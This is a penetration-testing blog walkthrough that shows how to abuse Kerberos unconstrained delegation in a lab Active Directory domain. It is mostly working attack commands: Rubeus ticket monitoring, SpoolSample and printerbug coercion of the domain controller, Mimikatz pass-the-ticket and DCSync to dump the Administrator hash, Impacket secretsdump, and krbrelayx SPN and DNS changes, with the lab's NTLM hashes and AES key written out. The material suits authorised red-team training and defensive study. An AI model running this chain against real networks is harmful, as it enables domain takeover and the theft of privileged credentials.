Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This was implemented in windows ecosystems since Windows 2000. Systems which are configured for unconstrained delegation will have the TGT (Ticket Granting Ticket) stored into LSASS memory for the purpose of enabling the user to access the end resource.

More specifically, the domain controller places a copy of the user’s TGT into the service ticket. When the user’s service ticket (TGS) is provided to the server for service access the server opens the TGS and places the user’s TGT into the LSASS for later use allowing the server to impersonate the user. Obtaining the ticket could lead to domain escalation as the ticket might belong to the machine account of the domain controller or a high privilege account like the domain administrator. For a computer to authenticate on behalf of other services (unconstrained delegation) two conditions are required:

  1. Account has the TRUSTED_FOR_DELEGATION flag in the User Account Control (UAC) flags.
  2. User account has not the NOT_DELEGATED flag set which by default non domain accounts have this flag.

The following image represents a host in the Active Directory which is configured for unconstrained delegation:

Trust Computer for Delegation

Discovery

Identification of systems which are configured for unconstrained delegation is trivial from a PowerShell console. Executing the module “Get-ADComputer” and filtering the results to display the output of the property “trustedfordelegation” will determine whether the host which operations are performed is configured for unconstrained delegation.

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
Unconstrained Delegation – Retrieve Active Directory Computers

Other interesting properties that can be enumerated are the:

  • TrustedToAuthForDelegation
  • msDS-AllowedToDelegateTo
  • PrincipalsAllowedToDelegateToAccount
Get-ADComputer "Hive" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount
Unconstrained Delegation – Computer Properties

Using the same module querying the “userAccountControl” attribute can provide the same results.

Get-ADComputer -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
Unconstrained Delegation – User Account Control

Alternatively, the “Get-NetComputer” module from PowerView can be used to discover hosts which are configured for unconstrained delegation.

Get-NetComputer -Unconstrained
Unconstrained Delegation – PowerView

Coerce Authentication

There are multiple protocols which can coerce the machine account of the domain controller to authenticate with other hosts on the system such as spoolsample and encrypting file services remote procedure call. However, capturing the ticket of the machine account requires Rubeus to run in monitor state mode.

Rubeus.exe monitor /monitorinterval:10 /targetuser:DC$ /nowrap
Rubeus – TGT Monitoring

Execution of the printer bug will coerce the domain controller to authenticate with the workstation which is configured for unconstrained delegation.

SpoolSample.exe dc hive
Unconstrained Delegation – SpoolSample

The ticket granting ticket (TGT) of the domain controller machine account will received and captured by Rubeus.

Rubeus – DC$ Machine Account Ticket

The ticket will be in base64 format and therefore cannot be used directly. However, from a PowerShell console execution of the command below will convert the ticket and write the contents to a file with the .kirbi extension.

[IO.File]::WriteAllBytes("C:\Users\pentestlab.PURPLE\Desktop\DC.kirbi", [Convert]::FromBase64String("Base64"))
Convert Base64 Ticket to Kirbi

Using the Pass the Ticket within Mimikatz the current user account will get high privilege rights on the domain controller. This can be verified by using the DCSync technique in order to dump the NTLM hash of the domain admin account and get command execution via pass the hash on the domain controller.

kerberos::ptt DC.kirbi
lsadump::dcsync /domain:purple.lab /user:Administrator
Mimikatz – Pass the Ticket

HTTP Authentication

it is not uncommon for administrators on the domain to use PowerShell scripts in order to perform remote tasks on hosts or construct HTTP requests which can be executed periodically in a server for business reasons. In the event that these scripts are executed under the context of elevated credentials Kerberos tickets can also generated and extracted from the LSASS process for domain escalation.

Invoke-WebRequest http://ca.purple.lab -UseDefaultCredentials -UseBasicParsing
HTTP Request

The ticket of the administrator account will be cached into the memory of the LSASS process. Mimikatz can interact with this process and has a specific module which will attempt to retrieve cached tickets.

privilege::debug
sekurlsa::tickets
Unconstrained Delegation – Administrator TGT

Tickets can be exported locally by executing the command below directly from Mimikatz.

sekurlsa::tickets /export
Mimikatz – Export Administrator Ticket

The triage action of Rubeus will display in a table the available Kerberos tickets which are stored in memory and their associated service.

Rubeus triage
Rubeus – Triage

Since a ticket which belongs to the domain administrator exists in cache, executing the command below will dump all the tickets for that user.

Rubeus.exe dump /user:Administrator
Rubeus – Dump Administrator Ticket
Rubeus – Dump Ticket

The ticket of the domain administrator can be used on the current system or transferred to another host in order to be used with Mimikatz or Rubeus that support importing Kerberos tickets into memory.

kerberos::ptt C:\Users\pentestlab.PURPLE\Administrator@krbtgt-PURPLE.LAB.kirbi
Mimikatz – Pass the Ticket

Executing “klist” will validate that the ticket was cached in memory of the current session.

klist
List Kerberos Ticket

Using the ticket access to the domain controller has been achieved and can be confirmed by listing the contents of the C: drive.

dir \\dc.purple.lab\C$
DC Access

Non-Domain Joined

As with the majority of the techniques which include Kerberos abuse, unconstrained delegation can be conducted from a non domain joined systems as supporting tooling to replicate the steps performed above exists. Impacket has a python script which can be used to identify systems on the domain which are configured for delegation if valid domain credentials are supplied.

python3 findDelegation.py purple.lab/pentestlab:Password1234
Unconstrained Delegation – Impacket

Once administrative access has been achieved Impacket module “secretsdump” can be used to retrieve the NTLM hash of the machine account which its host is configured for unconstrained delegation.

secretsdump.py Administrator@hive.purple.lab
Secretsdump
Secretsdump – Machine Account hashes

The krbrelayx is a set of python tools which was developed by Dirk-Jan Mollema and can be utilized to abuse unconstrained delegation effectively from Linux based systems. Using the NTLM hash of the machine account (HIVE$) to authenticate with the active directory with the “addspn” python script to bind to the domain controller and retrieve information about the modification target.

python3 addspn.py -u purple\\Hive\$ -p aad3b435b51404eeaad3b435b51404ee:27b6e0dd98a862dc13456ca1c0f7d128 -s HOST/kali.purple.lab -q dc.purple.lab
krbrelayx – addspn

Using the same command with the “–additional” flag the service principal name of the machine account will modified via the “msDS-AdditionalDnsHostName” attribute to include the “HOST/kali.purple.lab” service principal name.

python3 addspn.py -u purple\\Hive\$ -p aad3b435b51404eeaad3b435b51404ee:27b6e0dd98a862dc13456ca1c0f7d128 -s HOST/kali.purple.lab dc.purple.lab --additional
SPN Modification

Coercing the machine account of the domain controller to authenticate with the host require the DNS name and not the IP address. Since the attack will executed from a non domain joined host the DNS server will not have any DNS record. However, utilizing the “dnstool” will add a DNS record on the domain controller for the host by executing the command below:

python3 dnstool.py -u purple\\Hive\$ -p aad3b435b51404eeaad3b435b51404ee:27b6e0dd98a862dc13456ca1c0f7d128 -r kali.purple.lab -d 10.0.0.3 --action add dc.purple.lab
Unconstrained Delegation – DNS Record

Similarly the DNS record can be added on the domain controller by creating an A record to resolve 10.0.0.3 (Kali IP address) to “kali2.purple.lab“.

python3 dnstool.py -u purple\\Hive\$ -p aad3b435b51404eeaad3b435b51404ee:27b6e0dd98a862dc13456ca1c0f7d128 -r kali2.purple.lab -a add -t A -d 10.0.0.3 10.0.0.1
krbrelayx – DNS Record

Executing “nslookup” will validate the DNS entry and that the host now resolves to “kali1.purple.lab“.

nslookup kali1.purple.lab 10.0.0.1
nslookup

The “krbrelayx” can take the AES key of the machine account that was dumped earlier in order to be used for Kerberos authentication. Two listeners will be created by default SMB and HTTP.

sudo python3 krbrelayx.py -aesKey b4dc28d2ec920d4f87bc1d610f2b6e8e1114aec5135797482020893b3aad03c6
krbrelayx – Listeners

The next step is to coerce the machine account of the domain controller to authenticate with the host which the listeners are running. The printer bug (SpoolSample) or PetitPotam can be used using the NTLM hash of the machine account which is configured for unconstrained delegation and the host name which the listeners are running.

python3 printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:27b6e0dd98a862dc13456ca1c0f7d128 purple.lab/Hive\$@dc.purple.lab kali.purple.lab
krbrelayx – PrinterBug

Once the authentication is triggered the ticket of the domain controller machine account will retrieved and saved in the cache of the host. This is because the authentication of the domain controller to the arbitrary host will performed using Kerberos authentication. Since the ticket belongs to an elevated account of the domain controller domain escalation has been achieved and domain hashes could be retrieved via the DCSync technique.

krbrelayx – Kerberos Ticket

References

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s